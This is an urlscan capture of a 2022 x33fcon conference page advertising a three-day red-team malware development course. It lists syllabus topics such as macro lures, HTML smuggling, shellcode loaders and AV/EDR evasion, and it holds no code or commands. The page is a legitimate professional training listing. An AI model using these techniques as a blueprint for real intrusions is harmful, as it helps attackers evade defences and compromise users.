www.x33fcon.com Open in urlscan Pro
149.56.46.234  Public Scan

Form analysis
0 forms found in the DOM

Text Content

This website requires Javascript to be enabled. Please turn on Javascript and
reload the page.
Toggle navigation
 * 
 * Conference
   * Current Edition
   * When
   * Venue
   * Agenda
   * Tickets
   * Conference Registration
 * Training
   * Available Training
   * When
   * Venue
   * Online Training
   * On Site Training
   * Training Registration
 * Partnership
   * Data & Statistics
   * Contact
 * Archive
   * x33fcon 2017
   * x33fcon 2018
   * x33fcon 2019
   * x33fcon 2020
   * x33fcon 2021
 * About
   * About us
   * About x33fcon
   * Who Should Attend
   * Credits
   * Terms & Conditions
   * 
   * Contact
 * CORONAVIRUS
 * FAQ
 * REGISTER
   * Online Training
 * 

 * Modern Red Team Malware Development Strategies
 * Overview
 * Course Content
 * Target Audience
 * Prerequisites
 * Trainer's Bio


MODERN RED TEAM MALWARE DEVELOPMENT STRATEGIES¶

[ ↑ ]

DATES: JULY 18-20¶

DURATION: 3 DAYS¶

PRICE: CHECK HERE¶

AUDIENCE LEVEL: INTERMEDIATE¶

TAGS: MODERN, RED TEAM, MALWARE, DEVELOPMENT, EVASION¶

--------------------------------------------------------------------------------


OVERVIEW¶

[ ↑ ]



This course dives deep into Modern Red Team Malware Development Strategies that
were found effective on numerous engagements delivered in tightly monitored
environments. Author will share his insights regarding tactics that made his
malware acomplish engagement objectives, side by side with AVs&EDRs





Designing modern Red Team malware carriers smuggled in scripts, executables and
HTML websites are only some of the areas the course focuses on. Students will
learn numerous technical concepts, craft their own malicious Office documents,
shellcode loaders, smuggling payloads and other infected scripts to breach
target systems running AVs and EDRs. By applying modern AV & EDR evasion
techniques into custom crafted Red Team implants and documents, capable teams
will be equipped with knowledge to succeed during adversary simulations even in
the most tightly controlled environments.




COURSE CONTENT¶

[ ↑ ]


DAY 1¶

 * Classic file infection vectors – VBS/HTA/SCT/WSF/XSL/WSC/VBE/LNK – structure
   examination & practical utilisation
 * Container files – ISO/IMG/VHD/7zip/PDF
 * Successful strategies for HTML Smuggling
 * Hosting Red Team malware in cloud resources for Initial Access purposes
 * Viable tactics for WSH scripts (VBScript/JScript/HTA) that evade specific
   detections
 * Advanced LNK infection techniques
 * LOLBINs, Windows Defender Attack Surface Reduction rules bypasses, trusted
   paths


DAY 2¶

 * VBA Macros in 2022 - successful strategies
 * Exotic VBA Macro carriers
 * „Lures” – how to entice user into enabling macros
 * Various means to execute implant in VBA - .NET Reflection, XSL
   Deserialization, XLAM Droppers, and more
 * Evading ASR rules in VBA
 * Hiding payloads in Office file structures
 * Alternative Macro autorun techniques
 * VBA Purging, VBA Stomping, VBAProject.bin manipulation
 * Obfuscation techniques, Office files encryption, anonymization, lowering
   detection rate


DAY 3¶

 * Useful PE Executables: EXE, XLL, CPL, others
 * Which language to choose for your loader? – Rust, Go, C++, Python, C#, Nim,
   F#, how about Pascal?
 * Shellcode Loaders - the ultimate weapon
 * Overview on executable protection & obfuscation techniques
 * Hiding payloads in PE sections & overlay
 * Shellcode Fluctuation, Thread Stack Spoofing
 * To Process Inject or Not?
 * Dynamic API Unhooking, Direct Syscalls
 * Execution Guardrails – Sensing sandboxes and untrusted execution environments
 * Other exotic evasion strategies


TARGET AUDIENCE¶

[ ↑ ]



This training is designed to supply with practical knowledge variety of IT
specialists, including:



 * Penetration Testers
 * Red Team operators
 * SOC analysts
 * Security Professionals
 * IT Support, administrative and network personnel


PREREQUISITES¶

[ ↑ ]


PREREQUISITE KNOWLEDGE¶

 * A firm familiarity of Windows and Linux command line syntax
 * Understanding of networking concepts
 * Previous pentesting and/or SOC experience is advantageous, but not required


HARDWARE / SOFTWARE REQUIREMENTS¶

 * Students will need to bring a laptop to which they have administrative/root
   access, running either Windows, Linux or Mac operating systems
 * Students will need to have access to VNC, SSH and OpenVPN clients on their
   laptops (these can be installed at the start of the training)














TRAINER'S BIO¶

[ ↑ ]


| MARIUSZ BANACH¶

> Mariusz is an active security researcher, pentester and red team operator
> currently involved in advanced adversary simulations for an international
> Bank. With the 8+ years long experience gained as a malware analyst and AV
> engine developer, penetration tester who performed tens of assessments of
> egzotic networks and systems and finally as a red team operator - he now
> teaches, helps analyze and devises new Threat Tactics, Techniques and
> Procedures (TTPs).
> 
> 
> 
> 
> 
> He is best known for his researches on malware development and frequent
> releases of offensive tools that help red teams bolster their game against
> cybersecurity criminals. Most of his work is published on github.com/mgeeky .
> 
> 
> 
> 
> 
> Passionately provides his Partners unique advisory, learning and detection
> opportunities by sharing security expertise ranging from applications, through
> corporate infrastructures, domain environments, clouds - ending on Windows
> low-level. Over the years, he has acquired a number of certifications.

--------------------------------------------------------------------------------

Copyright © 2022 x33fcon. All rights reserved.
Website generated with MDwiki © Timo Dörr and contributors.